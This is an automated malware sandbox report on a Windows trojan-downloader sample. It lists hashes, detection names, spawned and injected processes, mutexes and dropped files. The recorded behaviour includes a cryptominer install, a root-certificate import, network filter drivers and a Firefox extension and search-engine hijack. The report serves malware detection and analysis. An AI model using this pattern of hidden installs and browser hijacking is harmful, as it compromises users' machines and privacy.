SearchProtectToolbar_pcap_a106c38e96
HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), Trojan.NSIS.StartPage.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, SearchProtectToolbar_pcap.YR, mzpefinder_pcap_file.YR, SearchProtectToolbar.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, VirTool
This description has been generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.
MD5: a106c38e961227fe401fed3e357285bc
SHA1: 0f20114e27ce4a22b68bd6b326d6033183ccfa24
SHA256: 1c17b3de2308f87d3e9cbee15e9938a8d81377195f8f4fc6030b09e7a1352046
SSDeep: 1536:RQpQ5EP0ijnRTXJz54Gc9 BUM/wAcP0lscLD8F:RQIURTXJz54GW BUM/w9if6
Size: 71112 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: g3CvT78vSMa0N0LPai7QvtmUwmghB
Created at: 2009-12-06 00:50:46
Analyzed on: Windows7Ada SP1 64-bit
Summary:
Trojan-Downloader: a Trojan program that downloads files from the Internet without the user's knowledge and executes them.
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
ProtectService.exe:3580
ProtectService.exe:3668
g3CvT78vSMa0N0LPai7Qvt_mb_1.exe:1884
ProtectWindowsManager.exe:3736
ProtectWindowsManager.exe:3316
import_root_cert.exe:3188
15094FED_stp.EXE:3668
cpuminer-x11opt-setup.exe:3752
DesProtetor.exe:536
wpm_v20.0.0.2227.exe:3268
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_nj.exe:3948
QQBrowser.exe:3824
QQBrowser.exe:3212
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_br.exe:3816
powershell.exe:3772
powershell.exe:3656
powershell.exe:3376
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_am2.exe:3564
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cp.exe:3480
XTab_Setup2253.exe:1748
cmdshell.exe:3596
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_a9.exe:3400
amisid.exe:3516
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe:4024
nfregdrv.exe:3588
nfregdrv.exe:3076
nfregdrv.exe:1648
nfregdrv.exe:3924
nfregdrv.exe:3192
HPNotify.exe:3640
CashReminder.exe:3984
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cr.exe:1520
ActSys.exe:148
certutil.exe:3280
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_ps.exe:3268
amisetup2899__9664.exe:3368
GOSafer.exe:3264
WNet.exe:4016
310714_is.exe:948
The Trojan injects its code into the following process(es):
DesProtetor.exe:4032
%original file name%.exe:1512
CashReminder.exe:1108
ActSys.exe:3756
GOSafer.exe:3284
WNet.exe:3080
Mutexes
The following mutexes were created/opened:
ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
File activity
The process ProtectService.exe:3580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\XTab\msvcp110.dll (536 bytes)
%Program Files% (x86)\XTab\msvcr110.dll (876 bytes)
The process ProtectService.exe:3668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\XTab\CmdShell.exe (32 bytes)
The process g3CvT78vSMa0N0LPai7Qvt_mb_1.exe:1884 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\mt-core[1].js (42633 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\contabilizar[1].htm (162 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\error[1] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\icone_cadeado[1].gif (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\verificar_ip[1].htm (105 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\error[1] (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp\nsWeb.dll (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\i[1].gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\top-line[1].gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\8Hk4o[1].htm (185 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\SL2[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\carregando[1].gif (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\s9[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\warning[1] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310113f8[1].htm (1006 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\010914i[1].htm (308 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BD.tmp (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\MobiMidia_validation[1].js (865 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\150814c[1].htm (637 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\carregando3[1].gif (1 bytes)
The process ProtectWindowsManager.exe:3736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\up[1].htm (1 bytes)
C:\ProgramData\WindowsMangerProtect\update\conf (1 bytes)
The process import_root_cert.exe:3188 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\certutil.exe (90 bytes)
The process 15094FED_stp.EXE:3668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\DesProtetor\uninst.exe (1305 bytes)
%Program Files% (x86)\DesProtetor\nfregdrv.exe (1601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh2AB9.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2A2C.tmp (74611 bytes)
%Program Files% (x86)\DesProtetor\ssleay32.dll (12088 bytes)
%Program Files% (x86)\DesProtetor\nfapi.dll (4992 bytes)
%Program Files% (x86)\DesProtetor\desprotetordrv.sys (1856 bytes)
C:\Windows\System32\drivers\desprotetordrv.sys (51 bytes)
%Program Files% (x86)\DesProtetor\libeay32.dll (35507 bytes)
%Program Files% (x86)\DesProtetor\DesProtetor.exe (15982 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh2AB9.tmp\SimpleSC.dll (1921 bytes)
%Program Files% (x86)\DesProtetor\ProtocolFilters.dll (9320 bytes)
The process cpuminer-x11opt-setup.exe:3752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\CPUFeatures.dll (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\System.dll (23 bytes)
C:\Windows\System32\cpuminer-gw64.exe (41231 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\nsProcess.dll (12 bytes)
C:\Windows\System32\cpuminer-conf.json (420 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\cpuminer\cpuminer-uninst.exe (1279 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\UserInfo.dll (8 bytes)
The process DesProtetor.exe:536 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\DesProtetor\ProtocolFilters.dll (249 bytes)
The process DesProtetor.exe:4032 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[5].txt (111 bytes)
C:\Windows\Temp\P_RuleList.txt (111 bytes)
The process wpm_v20.0.0.2227.exe:3268 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe (2444 bytes)
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_nj.exe:3948 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\ActSys\asfilterdrv.sys (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\smime3.dll (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\SelfDel.dll (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\softokn3.dll (12536 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\nspr4.dll (6360 bytes)
%Program Files% (x86)\ActSys\ssleay32.dll (12088 bytes)
%Program Files% (x86)\ActSys\remove_ActSys.exe (313 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\System.dll (23 bytes)
C:\Windows\System32\drivers\asfilterdrv.sys (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\mozcrt19.dll (23936 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\nsExec.dll (14 bytes)
%Program Files% (x86)\ActSys\ProtocolFilters.dll (38495 bytes)
%Program Files% (x86)\ActSys\ActSys.exe (15990 bytes)
%Program Files% (x86)\ActSys\libeay32.dll (35507 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\SimpleSC.dll (1921 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscF0B5.tmp (140252 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\certutil.exe (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\plc4.dll (784 bytes)
%Program Files% (x86)\ActSys\nfregdrv.exe (1601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\nss3.dll (12536 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\NJaxIntermediate.cer (774 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\plds4.dll (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss (4 bytes)
%Program Files% (x86)\ActSys\nfapi.dll (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\import_root_cert.exe (3406 bytes)
The process QQBrowser.exe:3824 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\RegWrite.exe (86 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.2227.exe (676 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ChromeSync.exe (286 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\XTab_Setup2253.exe (148 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\479.db (288 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WebDataJs (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ClearnC.exe (114 bytes)
The process QQBrowser.exe:3212 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\icon.png (628 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\index.html (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\prefs.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\aes.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code1.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\default_logo.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\lib\jquery.autocomplete.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\479.json (512 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\newtab.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\pack\xagainit.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\mostgrid.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code2.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\misc.js (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\button1.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\settings.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\google_trends.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\pack\common.js (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checkbox_select.png (783 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\MessageBox.xml (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code5.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\en-US\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\js.js (660 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\pl\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bg1.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\simple.css (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-CH\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bk_shadow.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\defaults\preferences\preferences.js (379 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\loading_bg.png (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\scrollbar.bmp (37 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\addonmanager.js (531 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code4.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\zh-TW\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.json (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\ru\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code3.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\button.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\install.rdf (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code6.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\lib\doT.min.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\hotSearch.js (6 bytes)
C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\min.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\googlelogo.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-LU\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-BE\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\QQBrowserFrame.dll (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\misc.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\uninstallDlg2.xml (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\stat.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\vi\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\tr\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checked.png (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\restoreprefs.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checkbox.png (545 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\en\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome.manifest (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\properties.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\pack\ga.js (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.ini (486 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\logo.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bg.png (673 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\about_blank_hook.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\lib\jquery-2.1.0.min.js (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\popup_image_helper.js (693 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\loading_light.png (139 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\pt-BR\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\es\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\unchecked.png (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\quick_start.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\urlrequestor.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\search.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\last_tab.js (4 bytes)
C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\style.css (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\it\locale.properties (1 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\it-CH\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\UninstallManager.exe (14022 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\83B.tmp (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\Thumbs.db (42 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\speed_dial.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\es-419\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\loading.gif (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\quick_start.xul (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\close.png (3 bytes)
%Program Files% (x86)\Mozilla Firefox\browser\searchplugins\istartsurf.xml (553 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\ru-MO\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\Thumbs.db (27 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\remoterequest.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\zh-CN\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\81A.tmp (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\defaults\preferences\fvd.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-CA\locale.properties (2 bytes)
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_br.exe:3816 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\WNet\ssfilterdrv.sys (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssEEA4.tmp\SimpleSC.dll (1921 bytes)
C:\Windows\System32\drivers\ssfilterdrv.sys (51 bytes)
%Program Files% (x86)\WNet\uninst.exe (2792 bytes)
%Program Files% (x86)\WNet\nfregdrv.exe (1601 bytes)
%Program Files% (x86)\WNet\ProtocolFilters.dll (9320 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmEDE7.tmp (70570 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssEEA4.tmp\SelfDel.dll (13 bytes)
%Program Files% (x86)\WNet\ssleay32.dll (12088 bytes)
%Program Files% (x86)\WNet\WNet.exe (15606 bytes)
%Program Files% (x86)\WNet\libeay32.dll (35507 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssEEA4.tmp\System.dll (23 bytes)
%Program Files% (x86)\WNet\nfapi.dll (4992 bytes)
The process %original file name%.exe:1512 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\error[2] (1 bytes)
